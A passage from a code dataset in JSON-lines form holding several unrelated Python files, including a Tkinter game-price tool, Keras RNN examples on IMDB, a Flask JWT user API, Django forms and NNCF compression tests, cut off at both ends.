(\"\\nuniversalis.app/market/\" + str(best_prices[5]).replace('(', '').replace(')', '').replace(',', '').replace(' ', ' PricePerToken: '))+ \\\r\n (\"\\nuniversalis.app/market/\" + str(best_prices[6]).replace('(', '').replace(')', '').replace(',', '').replace(' ', ' PricePerToken: '))+ \\\r\n (\"\\nuniversalis.app/market/\" + str(best_prices[7]).replace('(', '').replace(')', '').replace(',', '').replace(' ', ' PricePerToken: '))+ \\\r\n (\"\\nuniversalis.app/market/\" + str(best_prices[8]).replace('(', '').replace(')', '').replace(',', '').replace(' ', ' PricePerToken: '))+ \\\r\n (\"\\nuniversalis.app/market/\" + str(best_prices[9]).replace('(', '').replace(')', '').replace(',', '').replace(' ', ' PricePerToken: '))+ \\\r\n (\"\\nuniversalis.app/market/\" + str(best_prices[10]).replace('(', '').replace(')', '').replace(',', '').replace(' ', ' PricePerToken: '))+ \\\r\n (\"\\nuniversalis.app/market/\" + str(best_prices[11]).replace('(', '').replace(')', '').replace(',', '').replace(' ', ' PricePerToken: '))+ \\\r\n (\"\\nuniversalis.app/market/\" + str(best_prices[12]).replace('(', '').replace(')', '').replace(',', '').replace(' ', ' PricePerToken: '))+ \\\r\n (\"\\nuniversalis.app/market/\" + str(best_prices[13]).replace('(', '').replace(')', '').replace(',', '').replace(' ', ' PricePerToken: '))+ \\\r\n (\"\\nuniversalis.app/market/\" + str(best_prices[14]).replace('(', '').replace(')', '').replace(',', '').replace(' ', ' PricePerToken: '))\r\n )\r\n\r\n\r\nroot = tk.Tk()\r\n\r\ncanvas = tk.Canvas(root, height=Height, width=Width)\r\ncanvas.pack()\r\n\r\nframe = tk.Frame(root)\r\nframe.place(relx=0.4, rely=0.05, relwidth=0.2, relheight=0.1)\r\n\r\nbox = tk.Text(root, bg=\"white\")\r\nbox.place(relx=0.1, rely=0.2, relwidth=0.8, relheight=0.7)\r\n\r\nS = tk.Scrollbar(root)\r\nT = tk.Text(root, height=10, width=50)\r\nS.config(command=T.yview)\r\nT.config(yscrollcommand=S.set)\r\nT.place(relx=0.1, rely=0.2, relwidth=0.8, relheight=0.7)\r\nS.place(relx=0.9, rely=0.2, relwidth=0.05, relheight=0.7)\r\n\r\nT.insert(tk.END, \"After clicking the button, please be patient\\nit may take some time to search all exarchic gear:\")\r\n\r\nbutton = tk.Button(frame, text=\"Show Best\", command=search_best)\r\nbutton.pack(expand=True, fill=\"both\")\r\n\r\nroot.mainloop()\r\n","sub_path":"Python Script not compiled/FFXIV Item Pricer v1.py","file_name":"FFXIV Item Pricer v1.py","file_ext":"py","file_size_in_byte":6585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"287095551","text":"# https://atcoder.jp/contests/agc018/tasks/agc018_b\nimport sys\nsys.setrecursionlimit(2147483647)\nINF=float(\"inf\")\nMOD=10**9+7\ninput=lambda:sys.stdin.readline().rstrip()\ndef resolve():\n n,m=map(int,input().split())\n A=[list(map(lambda x:int(x)-1,input().split())) for _ in range(n)]\n ans=INF\n\n for _ in range(m):\n C=[0]*m # スポーツのカウンター\n for i in range(n):\n for j in range(m):\n if(A[i][j] is not None):\n C[A[i][j]]+=1\n break\n M=max(C)\n ans=min(ans,M)\n ind=C.index(M)\n for i in range(n):\n for j in range(m):\n if(A[i][j]==ind):\n A[i][j]=None\n\n print(ans)\nresolve()\n","sub_path":"AGC018/b_sports_festival.py","file_name":"b_sports_festival.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"74641358","text":"import jieba\nimport json\nimport numpy as np\nimport pickle\nimport random\nimport tensorflow as tf\nimport tflearn\n\nwith open('intents.json') as json_data:\n intents = json.load(json_data)\n\nwords = []\nclasses = []\ndocuments = []\nignore_words = [\"?\", \"的\", \"。\", \"!\", \"你们\", \"是\", \"有\", \"吗\", \"我\", \"想\", \"我能\", \"不\", \"什么\", \"最\"]\nsuggest_words = [\"老板好\", \"下次见\"]\nfor word in suggest_words:\n jieba.suggest_freq(word, True)\n\nfor intent in intents['intents']:\n for phrase in intent['phrases']:\n w = list(jieba.cut(phrase, cut_all=False))\n words.extend(w)\n documents.append((w, intent['intent']))\n if intent['intent'] not in classes:\n classes.append(intent['intent'])\n\nwords = [w for w in words if w not in ignore_words]\nwords = sorted(list(set(words)))\n\nclasses = sorted(list(set(classes)))\n\nprint(len(documents), \"documents\")\nprint(len(classes), \"classes\", classes)\nprint(len(words), \"words\", words)\n\ntraining = []\noutput = []\noutput_empty = [0] * len(classes)\n\nfor doc in documents:\n bag = []\n pattern_words = doc[0]\n for w in words:\n bag.append(1) if w in pattern_words else bag.append(0)\n\n output_row = list(output_empty)\n output_row[classes.index(doc[1])] = 1\n\n training.append([bag, output_row])\n\nrandom.shuffle(training)\ntraining = np.array(training)\n\ntrain_x = list(training[:, 0])\ntrain_y = list(training[:, 1])\n\ntf.reset_default_graph()\nnet = tflearn.input_data(shape=[None, len(train_x[0])])\nnet = tflearn.fully_connected(net, 8)\nnet = tflearn.fully_connected(net, 8)\nnet = tflearn.fully_connected(net, len(train_y[0]), activation='softmax')\nnet = tflearn.regression(net)\n\nmodel = tflearn.DNN(net, tensorboard_dir='saved/tflearn_logs')\nmodel.fit(train_x, train_y, n_epoch=1500, batch_size=5, show_metric=True)\nmodel.save('saved/model.tflearn')\n\npickle.dump({'words': words, 'classes': classes, 'train_x': train_x, 'train_y': train_y},\n open(\"saved/training_data\", \"wb\"))\n","sub_path":"chatbot-2/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"371060572","text":"import funciones as f\nimport numpy as np\nimport pandas as pd\nimport datetime as dt\n\n#El objetivo de este ejercicio es analizar sub muestras y procesarlas según un rango de fecha.\n#El formato de las fechas es \nformat = \"%Y/%m/%d %H:%M\"\nfechas = [\n {\"Descripcion\":\"Primer Semana de Enero\" ,\"sFechaInicio\":\"2019/01/01 00:00\",\"sFechaFin\":\"2019/01/07 23:00\"},\n {\"Descripcion\":\"Segunda Semana de Enero\" ,\"sFechaInicio\":\"2019/01/08 00:00\",\"sFechaFin\":\"2019/01/14 23:00\"},\n {\"Descripcion\":\"Enero y Febrero\" ,\"sFechaInicio\":\"2019/01/01 00:00\",\"sFechaFin\":\"2019/03/01 00:00\"},\n {\"Descripcion\":\"Marzo y Abril\" ,\"sFechaInicio\":\"2019/01/01 00:00\",\"sFechaFin\":\"2019/03/01 00:00\"},\n]\n\n\n\nN_armonicos = 4\nfor fecha in fechas:\n print(fecha)\n mediciones_alturas = f.leer_archivo_maine(fecha[\"sFechaInicio\"],fecha[\"sFechaFin\"])['Verified (m)']\n N_samples = int(len(mediciones_alturas))\n tiempo = np.arange(N_samples)\n mediciones_alturas_fft = f.fft_datos(mediciones_alturas)\n W_samples = int(len(mediciones_alturas_fft))\n omega = np.arange(W_samples) * (2*np.pi/N_samples)\n freq = np.arange(W_samples) / N_samples\n #Calculo para los 4 armónicos principales\n indices_armonicos = f.obtener_indices_armonicos(mediciones_alturas_fft,N_armonicos)\n serie_fourier_alturas = f.sf_altura(mediciones_alturas_fft,tiempo,indices_armonicos)\n ecm_n = f.ECM(serie_fourier_alturas,mediciones_alturas)\n print(\"Las frecuencias utilizadas son :\",freq[indices_armonicos])\n print(\"El E.C.M para el rango de fechas de \"+fecha[\"sFechaInicio\"]+\" hasta \"+fecha[\"sFechaFin\"]+\" con \"+str(N_armonicos)+\" armónicos es: \",ecm_n)\n #Calculo para los 3 armónicos principales\n indices_armonicos = f.obtener_indices_armonicos(mediciones_alturas_fft,N_armonicos-1)\n serie_fourier_alturas = f.sf_altura(mediciones_alturas_fft,tiempo,indices_armonicos)\n ecm_n = f.ECM(serie_fourier_alturas,mediciones_alturas)\n print(\"El E.C.M para el rango de fechas de \"+fecha[\"sFechaInicio\"]+\" hasta \"+fecha[\"sFechaFin\"]+\" con \"+str(N_armonicos-1)+\" armónicos es: \",ecm_n)\n \n\n\n","sub_path":"Informe/T`P1_86559_88019/tp1_ejercicio_d.py","file_name":"tp1_ejercicio_d.py","file_ext":"py","file_size_in_byte":2083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"127162096","text":"import requests as rq\nimport re\n\nprefix = 'http://127.0.0.1:5000'\n\ndef print_response(response, body=None):\n print('Request:')\n print('\\tUrl: {}'.format(response.url))\n print('\\tMethod: {}'.format(re.search(\"\", str(response.request)).group(1)))\n print('\\tBody: {}'.format(body))\n print('Response:')\n print('\\tCode: {}'.format(response.status_code))\n content = response.content.decode(\"utf-8\")\n\n if len(content) > 200:\n content = content[:160] + \"...\" + content[-38:]\n print('\\tContent: {}'.format(content), end='')\n print('\\tHeaders: {}'.format(response.headers))\n print('-' * 30)\n\ndef send_get(message, url):\n print(message)\n url = prefix + url\n response = rq.get(url)\n print_response(response)\n\ndef send_post(message, url, body=None):\n print(message)\n url = prefix + url\n response = rq.post(url, json=body)\n print_response(response, body)\n\ndef send_put(message, url, body=None):\n print(message)\n url = prefix + url\n if body is None:\n response = rq.put(url)\n print_response(response, body)\n else:\n response = rq.put(url, data=body, headers={\"Content-Type\": \"application/json\"})\n print_response(response, body)\n\ndef send_delete(message, url):\n print(message)\n url = prefix + url\n response = rq.delete(url)\n print_response(response)\n\n# ------ Simple operations ------\nsend_get('Document for user with ID = 75', '/user/document/75')\nsend_get('Non existing user document', '/user/document/0')\nsend_get('Document for movie with ID = 3', '/movie/document/3')\nprint(\"----------------------------------------------\")\n# # # #------ Preselection ------\nsend_get('Preselection for user 75', '/user/preselection/75')\nsend_get('Preselection for movie 3', '/movie/preselection/3')\nprint(\"----------------------------------------------\")\n# # ------ Add/Update/Delete ------\nsend_put('Add new movie document number 80000 that nobody likes', '/movie/document/80000', '[]')\nsend_put('Add new movie document number 80001 that nobody likes', '/movie/document/80001', '[]')\nsend_put('Add new movie document number 80002 that nobody likes', '/movie/document/80002', '[]')\nprint(\"----------------------------------------------\")\nsend_put('Add new user document number 90000, who likes movies 80000 and 80001',\n'/user/document/90000', '[80000, 80001]')\nsend_get('Get new user 90000 document', '/user/document/90000')\nsend_get('Get updated movie 80000 document', '/movie/document/80000')\nsend_get('Get updated movie 80001 document', '/movie/document/80001')\nprint(\"----------------------------------------------\")\nsend_post('Update user 90000, that he now likes movies 80000 and 80002', '/user/bulk',\n[{\"user_id\": 90000, \"liked_movies\": [80000, 80002]}])\nsend_get('Get updated user 90000 document', '/user/document/90000')\nsend_get('Get updated movie 80000 document', '/movie/document/80000')\nsend_get('Get updated movie 80001 document', '/movie/document/80001')\nsend_get('Get updated movie 80002 document', '/movie/document/80002')\nprint(\"----------------------------------------------\")\nsend_delete('Remove user document number 90000', '/user/document/90000')\nsend_get('Get updated movie 80000 document', '/movie/document/80000')\nsend_get('Get updated movie 80001 document', '/movie/document/80001')\nsend_get('Get updated movie 80002 document', '/movie/document/80002')\nsend_delete('Remove movie document number 80000', '/movie/document/80000')\nsend_delete('Remove movie document number 80001', '/movie/document/80001')\nsend_delete('Remove movie document number 80002', '/movie/document/80002')","sub_path":"wtiproj07_api_client.py","file_name":"wtiproj07_api_client.py","file_ext":"py","file_size_in_byte":3627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"259796355","text":"import os\nimport psycopg2\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nCONN = None\nTESTING_MODE = False\n# def connect():\n # global CONN\n\nDATABASE_URL = os.getenv('DATABASE_URL')\ntry:\n CONN = psycopg2.connect(DATABASE_URL, sslmode='require')\n print('PostgreSQL connection successful')\nexcept (Exception, psycopg2.DatabaseError) as error:\n print(error)\n\n\ndef query(sql, args=()):\n ''' query the database and get back rows selected/modified '''\n cur = CONN.cursor()\n try:\n cur.execute(sql, args)\n except Exception as e:\n print(type(e).__name__, e)\n raise e\n if cur.description is None:\n rows = []\n else:\n rows = cur.fetchall()\n if not TESTING_MODE:\n CONN.commit()\n cur.close()\n return rows\n","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"390960321","text":"from gbe.models import Participant, Class, Show, Act\nfrom django import forms\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.forms import UserCreationForm\n\n\nclass ParticipantForm(forms.ModelForm):\n class Meta:\n model = Participant\n fields = [ 'stage_name', 'phone_number', \n 'email_address', 'street_address_1', 'street_address_2',\n 'city', 'state', 'zip_code', 'country',\n 'is_performer', 'is_worker']\n\n\n\nclass RegistrationForm(UserCreationForm):\n '''Form for creating a GBE user. Collects info for User object as \n well as for user's profile (Partificipant object)\n '''\n email = forms.EmailField(required=True)\n class Meta:\n model=User\n fields = {'username', 'first_name','last_name',\n 'email', 'password1', 'password2'}\n\n def save(self, commit=True):\n user = super(UserCreationForm, self).save(commit=False)\n user.email=self.cleaned_data['email']\n if commit:\n user.save()\n return user\n \n\nclass ActForm(forms.ModelForm):\n class Meta:\n model = Act\n fields = ['website', 'promo_image', 'contact', 'act_name', \n 'performers']\n\nclass ClassForm(forms.ModelForm):\n class Meta:\n model = Class\n fields = ['title', 'organizer', 'teacher', \n 'short_desc', 'long_desc']\n\nclass ShowForm(forms.ModelForm):\n class Meta:\n model = Show\n fields = ['title', 'organizer', 'mc', 'acts', \n 'short_desc', 'long_desc']\n \n \n","sub_path":"gbe/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"411272403","text":"import os\nimport cv2\nimport numpy as np\nfrom scipy.io import loadmat, savemat\n\n\ndef convert_training_images_to_numpy_array_for_each_class_color(pathname, no_of_images_in_each_class, mat_file_path):\n directory = os.fsencode(pathname)\n subdirectories = [dI for dI in os.listdir(directory) if os.path.isdir(os.path.join(directory, dI))]\n print(subdirectories)\n\n for directory in subdirectories:\n per_class_img_matrix = []\n dir_name = os.fsdecode(directory)\n print(\"DIR NAME :\" + dir_name)\n file_no = 1\n for file in os.listdir(pathname + dir_name):\n filename = os.fsdecode(file)\n print(\"FILE NAME :\" + filename)\n src_file = pathname + dir_name + \"/\" + filename\n image = cv2.imread(src_file, cv2.COLOR_RGB2BGR)\n per_class_img_matrix.append(image)\n if file_no == no_of_images_in_each_class:\n break\n file_no += 1\n\n mat_file_name = dir_name + \".mat\"\n modi_mat_file_path = mat_file_path + \"/\" + mat_file_name\n modi_label = dir_name\n\n conv_img_matrix = np.asarray(per_class_img_matrix)\n print(np.shape(conv_img_matrix))\n savemat(modi_mat_file_path, mdict={modi_label: conv_img_matrix})\n\n\ndef read_train_data_for_each_class(dir_path):\n for file in os.listdir(dir_path):\n filename = os.fsdecode(file)\n\n class_name = filename.split('.')[0]\n print(class_name)\n\n dataset_path = dir_path + \"/\" + filename\n data_set = loadmat(dataset_path)\n\n train_data = data_set[class_name]\n\n training_no_of_images_in_class = np.shape(train_data)[0]\n print(np.shape(train_data))\n\n i = 0\n while i < training_no_of_images_in_class:\n cv2.imshow(str(i + 1), train_data[i])\n cv2.waitKey(0)\n i += 1\n\n cv2.destroyAllWindows()\n\n\ndef convert_testing_images_to_numpy_array_color(pathname, mat_file_name, label):\n directory = os.fsencode(pathname)\n\n all_classes_img_matrix = []\n for file in os.listdir(directory):\n filename = os.fsdecode(file)\n print(\"FILE NAME :\" + filename)\n src_file = pathname + \"/\" + filename\n image = cv2.imread(src_file, cv2.COLOR_RGB2BGR)\n all_classes_img_matrix.append(image)\n\n conv_img_matrix = np.asarray(all_classes_img_matrix)\n print(np.shape(conv_img_matrix))\n\n savemat(mat_file_name, mdict={label: conv_img_matrix})\n\n\ndef read_test_data(file_path):\n data_set = loadmat(file_path)\n\n test_data = data_set['test']\n\n no_of_test_images = np.shape(test_data)[0]\n\n i = 0\n while i < no_of_test_images:\n cv2.imshow(test_data[i])\n cv2.waitKey(0)\n i += 1\n\n cv2.destroyAllWindows()\n\n\nif __name__ == \"__main__\":\n number_of_images_from_each_class = 3000\n # convert_training_images_to_numpy_array_for_each_class_color(\n # 'D:/ML_Project/asl-alphabet/asl_alphabet_train/asl_alphabet_train/',\n # number_of_images_from_each_class, 'D:/ML_Project/data_mat_files/color/training')\n # read_train_data_for_each_class('D:/ML_Project/data_mat_files/color/training/')\n\n # read_train_data_for_each_class('D:/ML_Project/data_mat_files/color/training/')\n\n # convert_testing_images_to_numpy_array(\"D:/ML_Project/asl-alphabet/asl_alphabet_test/asl_alphabet_test/\",\n # 'D:/ML_Project/color/testing/testing.mat', 'test')\n # read_test_data('D:/ML Project/color/testing.mat')\n","sub_path":"conv_images_to_mat_each_class_color.py","file_name":"conv_images_to_mat_each_class_color.py","file_ext":"py","file_size_in_byte":3486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"175962362","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 1 17:33:28 2019\n\n@author: Figo\n\"\"\"\n\nfrom keras.models import Sequential\nfrom keras.layers import Embedding, SimpleRNN\n\n##########利用keras中的SimpleRNN层 测试全部时间步的输出和最后一个时间步的输出 ##############3\n\n# 只返回最后一个时间步的输出。\nmodel = Sequential()\nmodel.add(Embedding(10000, 32))\nmodel.add(SimpleRNN(32))\nmodel.summary()\n\n# 返回每个时间步的输出\nmodel = Sequential()\nmodel.add(Embedding(10000, 32))\nmodel.add(SimpleRNN(32, return_sequences=True))\nmodel.summary()\n\n# 将多个循环层逐个堆叠 并 让所有中间层都返回完整的输出序列 最后一层仅返回最终输出\nmodel = Sequential()\nmodel.add(Embedding(10000, 32))\nmodel.add(SimpleRNN(32, return_sequences=True))\nmodel.add(SimpleRNN(32, return_sequences=True))\nmodel.add(SimpleRNN(32, return_sequences=True))\nmodel.add(SimpleRNN(32)) # This last layer only returns the last outputs.\nmodel.summary()\nprint('###################################################')\n\n############## 将这个模型应用于 IMDB 电影评论分类问题 ###################\n\n# 输出路径\nmodel_dir = 'D:/3_other_code/data/IMDB/model/'\nplt_dir = 'D:/3_other_code/data/IMDB/result_plt/'\n \n# 准备 IMDB 数据\nfrom keras.datasets import imdb\nfrom keras.preprocessing import sequence\n\n# 作为特征的单词个数\nmax_features = 10000\n# 在这么多单词之后截断文本(这些单词都属于前 max_features 个最常见的单词)\nmaxlen = 500\nbatch_size = 32\n\nprint('Loading data...')\n(input_train, y_train), (input_test, y_test) = imdb.load_data(num_words=max_features)\nprint(len(input_train), 'train sequences')\nprint(len(input_test), 'test sequences')\n\nprint('Pad sequences (samples x time)')\ninput_train = sequence.pad_sequences(input_train, maxlen=maxlen)\ninput_test = sequence.pad_sequences(input_test, maxlen=maxlen)\nprint('input_train shape:', input_train.shape)\nprint('input_test shape:', input_test.shape)\n\n# 用 Embedding 层和 SimpleRNN 层来训练模型\nfrom keras.layers import Dense\n\nmodel = Sequential()\n# 输入:(batch_size, maxlen),输出:(batch_size, maxlen, output_dim)\n# 32 用于指定Embedding层的输出维度\nmodel.add(Embedding(max_features, 32))\n# 输入:(batch_size, timesteps,input_features),输出:(batch_size, output_features) \nmodel.add(SimpleRNN(32))\nmodel.add(Dense(1, activation='sigmoid'))\nmodel.summary()\n\nmodel.compile(optimizer='rmsprop', loss='binary_crossentropy', metrics=['acc'])\nhistory = model.fit(input_train, y_train,\n epochs=10,\n batch_size=128,\n validation_split=0.2)\nmodel.save_weights(model_dir + 'Understanding_RNN_using_SimpleRNN.h5')\n\n# 绘制结果\nimport matplotlib.pyplot as plt\n\nacc = history.history['acc']\nval_acc = history.history['val_acc']\nloss = history.history['loss']\nval_loss = history.history['val_loss']\n\nepochs = range(len(acc))\n\nplt.plot(epochs, acc, 'bo', label='Training acc')\nplt.plot(epochs, val_acc, 'b', label='Validation acc')\nplt.title('Training and validation accuracy')\nplt.legend()\nplt.savefig(plt_dir + 'Understanding_RNN_using_SimpleRNN_acc')\n\nplt.figure()\nplt.plot(epochs, loss, 'bo', label='Training loss')\nplt.plot(epochs, val_loss, 'b', label='Validation loss')\nplt.title('Training and validation loss')\nplt.legend()\nplt.savefig(plt_dir + 'Understanding_RNN_using_SimpleRNN_loss')\n\nplt.show()\n\n##################使用 Keras 中的 LSTM 层######################\nprint('#####################################')\n\n# 定义LSTM模型并训练\nfrom keras.layers import LSTM\n\nmodel = Sequential()\nmodel.add(Embedding(max_features, 32))\nmodel.add(LSTM(32))\nmodel.add(Dense(1, activation='sigmoid'))\nmodel.summary()\n\nmodel.compile(optimizer='rmsprop',\n loss='binary_crossentropy',\n metrics=['acc'])\nhistory = model.fit(input_train, y_train,\n epochs=10,\n batch_size=128,\n validation_split=0.2)\nmodel.save_weights(model_dir + 'Understanding_RNN_using_LSTM.h5')\n\n# 绘制 acc 和 loss\nacc = history.history['acc']\nval_acc = history.history['val_acc']\nloss = history.history['loss']\nval_loss = history.history['val_loss']\n\nepochs = range(len(acc))\n\nplt.plot(epochs, acc, 'bo', label='Training acc')\nplt.plot(epochs, val_acc, 'b', label='Validation acc')\nplt.title('Training and validation accuracy')\nplt.legend()\nplt.savefig(plt_dir + 'Understanding_RNN_using_LSTM_acc')\n\nplt.figure()\nplt.plot(epochs, loss, 'bo', label='Training loss')\nplt.plot(epochs, val_loss, 'b', label='Validation loss')\nplt.title('Training and validation loss')\nplt.legend()\nplt.savefig(plt_dir + 'Understanding_RNN_using_LSTM_acc')\n\nplt.show()","sub_path":"deep_learning_code/deep_learning_2018/6_Understanding_recurrent_neural_networks.py","file_name":"6_Understanding_recurrent_neural_networks.py","file_ext":"py","file_size_in_byte":4731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"651748541","text":"from flask_jwt_extended import (\n jwt_required,\n create_access_token,\n create_refresh_token,\n get_jwt_identity,\n jwt_refresh_token_required,\n get_raw_jwt\n)\nfrom flask_restful import Resource, reqparse\nfrom werkzeug.security import safe_str_cmp\n\nfrom models.user import UserModel\nfrom revoked import REVOKED\n\n_user_parser = reqparse.RequestParser()\n_user_parser.add_argument('username', required=True, type=str, help='This field cannot be blank')\n_user_parser.add_argument('password', required=True, type=str, help='This field cannot be blank')\n\n\nclass UserRegister(Resource):\n def post(self):\n data = _user_parser.parse_args()\n\n if UserModel.find_by_username(data['username']):\n return {\"message\": \"User already exists.\"}, 400\n\n UserModel(**data).save_to_db()\n\n return {\"message\": \"User created successfully.\"}, 201\n\n\nclass User(Resource):\n @jwt_required\n def get(self, _id):\n\n user = UserModel.find_by_id(_id)\n\n if not user:\n return {\"message\": \"Cannot find user.\"}, 404\n\n return user.json(), 200\n\n @jwt_required\n def delete(self, _id):\n\n user = UserModel.find_by_id(_id)\n\n if not user:\n return {\"message\": \"Cannot find user.\"}, 404\n\n user.delete_from_db()\n\n return {\"message\": \"User deleted.\"}, 200\n\n\nclass UserAuth(Resource):\n @classmethod\n def post(cls):\n data = _user_parser.parse_args()\n\n user = UserModel.find_by_username(data['username'])\n\n if user and safe_str_cmp(user.password, data['password']):\n access_token = create_access_token(identity=user.id, fresh=True)\n refresh_token = create_refresh_token(user.id)\n return {\n \"access_token\": access_token,\n \"refresh_token\": refresh_token\n }, 200\n\n return {\"message\": \"Invalid credentials.\"}, 401\n\n\nclass UserRevoke(Resource):\n @jwt_required\n def post(self):\n jti = get_raw_jwt()['jti']\n REVOKED.add(jti)\n return {\n 'message': 'Successfully revoked user token.'\n }, 200\n\n\nclass TokenRefresh(Resource):\n @jwt_refresh_token_required\n def post(self):\n current_user_id = get_jwt_identity()\n new_token = create_access_token(identity=current_user_id, fresh=False)\n return {'access_token': new_token}, 200\n","sub_path":"resources/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"230752627","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('billing', '0021_auto_20160812_1109'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='transaction',\n name='user_pay',\n field=models.IntegerField(blank=True, null=True, default=0, verbose_name='Комиссия пользователя'),\n ),\n ]\n","sub_path":"billing/migrations/0022_auto_20160921_0330.py","file_name":"0022_auto_20160921_0330.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"327041106","text":"\"\"\"\n Copyright (c) 2019-2020 Intel Corporation\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n http://www.apache.org/licenses/LICENSE-2.0\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\"\"\"\nimport copy\nimport itertools\nimport os\nfrom functools import partial\nfrom functools import reduce\nfrom typing import Dict\nfrom typing import List\n\nimport onnx\nimport pytest\nfrom torch import cuda\nfrom torch import nn\nfrom torch.nn import DataParallel\n\nfrom nncf import NNCFConfig\nfrom nncf.algo_selector import COMPRESSION_ALGORITHMS\nfrom nncf.algo_selector import NoCompressionAlgorithmBuilder\nfrom nncf.api.compression import CompressionLevel\nfrom nncf.checkpoint_loading import load_state\nfrom nncf.compression_method_api import DOMAIN_CUSTOM_OPS_NAME\nfrom nncf.hw_config import HWConfigType\nfrom tests.helpers import BasicConvTestModel\nfrom tests.helpers import create_compressed_model_and_algo_for_test\nfrom tests.helpers import get_empty_config\nfrom tests.quantization.test_quantization_helpers import get_quantization_config_without_range_init\nfrom tests.sparsity.magnitude.test_helpers import get_basic_magnitude_sparsity_config\nfrom tests.sparsity.rb.test_algo import get_basic_sparsity_config\n\n\nclass BasicLinearTestModel(nn.Module):\n def __init__(self, size=4):\n super().__init__()\n self.fc = nn.Linear(size, size)\n\n def forward(self, x):\n return self.fc(x)\n\nclass BasicTestModelWithTwoInputOutput(nn.Module):\n def __init__(self, size=4):\n super().__init__()\n self.fc0 = nn.Linear(size, size)\n self.fc1 = nn.Linear(size, size)\n\n def forward(self, x0, x1):\n return self.fc0(x0), self.fc1(x1)\n\ndef get_const_sparsity_config():\n config = get_empty_config()\n config['compression'] = {'algorithm': 'const_sparsity'}\n return config\n\n\ndef get_basic_asym_quantization_config(model_size=4):\n config = get_quantization_config_without_range_init(model_size)\n config['compression']['activations'] = {\"mode\": \"asymmetric\"}\n config['compression']['initializer']['range'] = {\"num_init_samples\": 0}\n return config\n\n\n@pytest.mark.parametrize('config_provider',\n (get_quantization_config_without_range_init, get_basic_asym_quantization_config,\n get_basic_sparsity_config,\n get_basic_magnitude_sparsity_config, get_const_sparsity_config),\n ids=('SymQuantization', 'AsymQuantization', 'Sparsity', 'MagnitudeSparsity', 'ConstSparsity'))\n@pytest.mark.parametrize('model_provider', (BasicConvTestModel, BasicLinearTestModel),\n ids=('Conv2d', 'Linear'))\nclass TestCompressionAlgos:\n def test_can_export_compressed_model(self, tmp_path, config_provider, model_provider):\n test_path = str(tmp_path.joinpath('test.onnx'))\n model = model_provider()\n config = config_provider()\n _, compression_ctrl = create_compressed_model_and_algo_for_test(model, config)\n\n compression_ctrl.export_model(test_path)\n assert os.path.exists(test_path)\n\nclass TestConfigCreator:\n def __init__(self):\n self._config = get_empty_config()\n self._algorithm_sections = {}\n\n def create(self) -> NNCFConfig:\n self._config['compression'] = []\n for algo_name, params in self._algorithm_sections.items():\n algo_section = {'algorithm': algo_name}\n if params:\n algo_section['params'] = params\n self._config['compression'].append(algo_section)\n return self._config\n\n def add_algo(self, name: str, params: Dict = None):\n self._algorithm_sections[name] = params\n return self\n\n def __str__(self):\n return '_'.join(self._algorithm_sections)\n\n\nclass CompressionLevelTestStruct:\n def __init__(self, config_provider: 'TestConfigCreator', compression_levels: List[CompressionLevel]):\n self.config_provider = config_provider\n self.compression_levels = compression_levels\n\n def __str__(self):\n return str(self.config_provider)\n\n\nstaged_quantization_params = {'activations_quant_start_epoch': 1, 'weights_quant_start_epoch': 2}\nmagnitude_sparsity_params = {'schedule': 'multistep',\n 'multistep_steps': [1, 2],\n 'multistep_sparsity_levels': [0, 0.3, 0.5]}\nfilter_pruning_params = {'schedule': 'exponential', 'num_init_steps': 0, 'pruning_steps': 3}\nFFF_levels = [CompressionLevel.FULL] * 3\nNPF_levels = [CompressionLevel.NONE, CompressionLevel.PARTIAL, CompressionLevel.FULL]\nLIST_OF_TEST_PARAMS = [\n CompressionLevelTestStruct(\n config_provider=TestConfigCreator().add_algo('quantization'),\n compression_levels=FFF_levels\n ),\n CompressionLevelTestStruct(\n config_provider=TestConfigCreator().add_algo('quantization', staged_quantization_params),\n compression_levels=NPF_levels\n ),\n CompressionLevelTestStruct(\n config_provider=TestConfigCreator().add_algo('const_sparsity'),\n compression_levels=FFF_levels\n ),\n CompressionLevelTestStruct(\n config_provider=TestConfigCreator().add_algo('magnitude_sparsity', magnitude_sparsity_params),\n compression_levels=NPF_levels\n ),\n CompressionLevelTestStruct(\n config_provider=TestConfigCreator().add_algo('rb_sparsity', {\n 'sparsity_target': 0.61,\n 'sparsity_target_epoch': 2,\n }),\n compression_levels=NPF_levels\n ),\n CompressionLevelTestStruct(\n config_provider=TestConfigCreator().add_algo('filter_pruning', {\n 'num_init_steps': 1,\n 'pruning_steps': 2,\n }),\n compression_levels=[CompressionLevel.NONE, CompressionLevel.FULL, CompressionLevel.FULL]\n 